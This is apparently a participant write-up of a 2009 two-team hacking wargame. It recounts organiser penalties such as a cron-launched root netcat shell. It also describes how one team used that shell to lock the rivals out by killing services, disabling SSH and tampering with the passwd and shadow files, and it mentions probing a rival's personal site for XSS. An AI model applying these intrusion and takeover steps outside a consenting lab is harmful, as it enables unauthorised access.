Zen of IP
- Zen of IP
The first cycle started on 25th of July 2009 18:00 UTC and ended on 27th of July. The required tasks were as follows:
- non-fake identd
- bzflag server
Both teams managed to finish their tasks on time and the first task concluded with great success. So far there has been some talk about social engineering going on but nothing very concrete. The rinzai team has challenged soto to a very Zen deathmatch on their bzflag server - highly doubtful that anything good should become of that.
The second cycle started on 27th of July 18:00 UTC and ended on 1st of August. The requred tasks were as follows:
- Webserver with mod_python
- LDAP database
The cycle got delayed to allow the tasks to be completed
The third cycle started on 1st of August 20:00 UTC and will end on 8th of August. The required tasks are as follows:
- User-uploadable php and python web scripts
- DNS service that returns TXT records with man pages
As neither team was quite able to finish their tasks in time, a certain Mr Bad Hacker managed to create a user account on both rinzai and soto servers with a very predictable password. This penalty bought both teams 1 day to finish their tasks.
Continuing the pattern, neither team managed to finish neither task by the extended deadline. This prompted the return of Mr Bad Hacker who once again penetrated both systems in a similar but considerably more severe manner. This penalty bought both teams one more day to finish their tasks.
Furthermore, still missing the new services, vulnerable versions of udev and pulseaudio were forcefully installed on both team servers, with the badhacker account still available. However, both teams were able to secure their systems before the other team could take advantage of the vulnerabilities.
As a final penalty, a cronjob was set up to create a root shell on port 2222 on both teams' machines. Using this root shell, the soto team managed to compromise rinzai and kick them off their box. This happened roughly around August 12th 00:00 UTC. The soto team locked rinzai box down and started working on securing it in order to put the services back up as mandated by the endgame rules.
However, as the rinzai team did not insist (strong enough :) on getting the services back up and the soto team was slow to revive them, the game was ended and the soto team declared winner by exploiting a penalty-induced vulnerability.
In the beginning, OSCoder patched the kernel with grsec and MaXe was quick on installing IPKungFu for IPTables. Zakolus did some random stuff which I can't even remember, and I did some lame nmap scans and installed oidentd and bzflag. stevefrench never showed up for the entire wargame. We talked on the mailing list using a PGP team-key, for messages we didn't want/trust Siim about.
OSCoder chrooted bzflag (and oidentd?) and both teams sat around doing nothing after that. We kind of wasted the second and third cycles because the third cycle made the second cycle pointless. The LDAP server was also pretty lame, in which I took no part in.
When the DNS task came round, I used bash to output the man pages into a bind zone file. Only problem was bind never responded correctly to any of the dig commands I sent to it. Soon, Siim stepped in and the game was pretty much over for Rinzai as MaXe was online at the time that a root shell was created on both boxes with netcat.
So, in the start I wasn't doing much. In fact I was just trying to help with whatever I could but I didn't use the box at all to start with. However, I did set up a password protected IRC chatroom on a network I normally use that I knew I could trust. We also agreed to make sure we would come from the same IP's or else notify that we wouldn't so no imposters would enter the chatroom and gain info.
In the very beginning on a side note we established a secure communication method on our mailing list by using a private and a public PGP key. I think Malformation made that. Passwords were ridiculus easy but long enough to take sometime to bruteforce, even though we didn't care so much about passwords as we knew the opposite team would probably think that we would have insane passwords. Well..
After sometime I decided to log into the box and do some test scans and of course give a lot more ideas to the team. I did some scans of the internal network and the rinzai teams box however something went wrong with the scans, later on and today I know it was because not being root can end up giving bad scans, which I forgot earlier. However I already knew what they were running thus Siim occasionally gave us maps of what each team was running, meaning I wouldn't have to do any scanning myself.
Later on we had setted up a lot more, including a webserver with PHP. At that time I decided to harden both the Apache and PHP config files. I also took a look at other stuff at the box but didn't find anything else that needed to be hardened.
More time passed and nothing really happened, our IRC channel was almost empty at all times, except for me due to I was almost always there in my screen session.
Then some of the harder tasks came and nothing really happened, I tried to speak with my team but kinda no one replied back.
Then one night I was probably surfing around the web and had thunderbird open cause I had just received some mails and was awaiting some more. Then a mail came from Siim stating that apparently he had started a root shell with netcat..
Side Note: First time when mr badhacker visited the machine, we removed almost everything bad of what we believed to find of bad stuff.
Extra Side Note: Before hardening apache I did a check on rinzai teams leader, I found a XSS hole in his website and did a lot of digging which was posted to our mailing list, encrypted of course. After a short conversation with some team members we decided that it wasn't appropriate to hack the other members directly. So nothing went on from there and no more rinzai team members were "investigated". Except for a few things about a place / community where 2-3 of them were hanging out at.
Well back to the netcat shell, first I wanted to close it as fast as possible and I tried several times to login as root and a lot of ways with no luck. I was really confused and wrote a lot of mails to our mailing list (at least 15-20 but that also includes after getting access to the rinzai team box). Then I eventually found out that root had /bin/false or perhaps it was /bin/noshell (or something like that)..
The first thing I did however was to connect to the rinzai box and issue the users command to see who was online (w or who is good too but I just wanted a quick overview), I also did a netstat -antpe to see if they had connected to our (Soto) box which to my luck the only user online at rinzai didn't. In fact it looked like the user was unaware of the shell running on both machines. First I booted off the user from the server but he also reconnected instantly I guess.. So I disabled SSH in init.d, eventually deleting or chmod -x 'ing it later on just in case they had made some script to auto chmod +x init.d scripts and then i NC'd back to the Soto box, rebooted that one and then rebooted Rinzai's box very fast.
Both boxes rebooted and it looked like Rinzai wasn't running SSH. So far so good. I NC'd into their box and made SSH wasn't running and that no users were online. Good.
Then I started killing all their services and then deleted the service init.d scripts. I also played a little with the /etc/shadow and /etc/passwd first to see if I could login as root or a new users, but somehow I wasn't able to. I was rushing A LOT and did a lot of errors so I guess I tried to SSH after killing the service or I just did something terribly wrong.
After "owning" the rinzai box, I went to the soto box, nc'd as root and did a few mess-up's.. Then I got the server / box rebooted again I think.. (I did a lot of strange stuff xD).
Then I copied the /etc/passwd to GEdit, edited out your users (toor and badhacker) and made sure root would be able to use /bin/bash. Then I sent a reboot signal to the server again and killed the netcat shell.
What I didn't know is that it was running from cron, but I thought someone else from my team might figure that one out. Even though, I did write that the shell kept comming back and it was probably a cron.d script or some rootkit Siim had installed. The reason why I didn't check was because it was getting very late and if it was a rootkit I couldn't do much either so I just gave up and called it a night (and went to sleep).
Then I think it became monday, I was at work and saw some people from the Rinzai team write to the mailing list they weren't able to get onto their box. I laughed a bit and wondered if Siim would restore their box or not since I thought of it as cheating of what I did. At least it worked. I thought oh well, I wont take credit for this since OSCoder did a lot of work and I thought it would be the best if Malformation wrote it so the whole team would get credit. (I don't have a big ego nor am I "greedy" in such cases).
I laughed a bit when he wrote they got owned heh, especially when some people really didn't get it.
A last side note: Before screwing over their /etc/shadow files etc I took a backup of course and sent to the soto mailing list as well, just for the fun of it :-)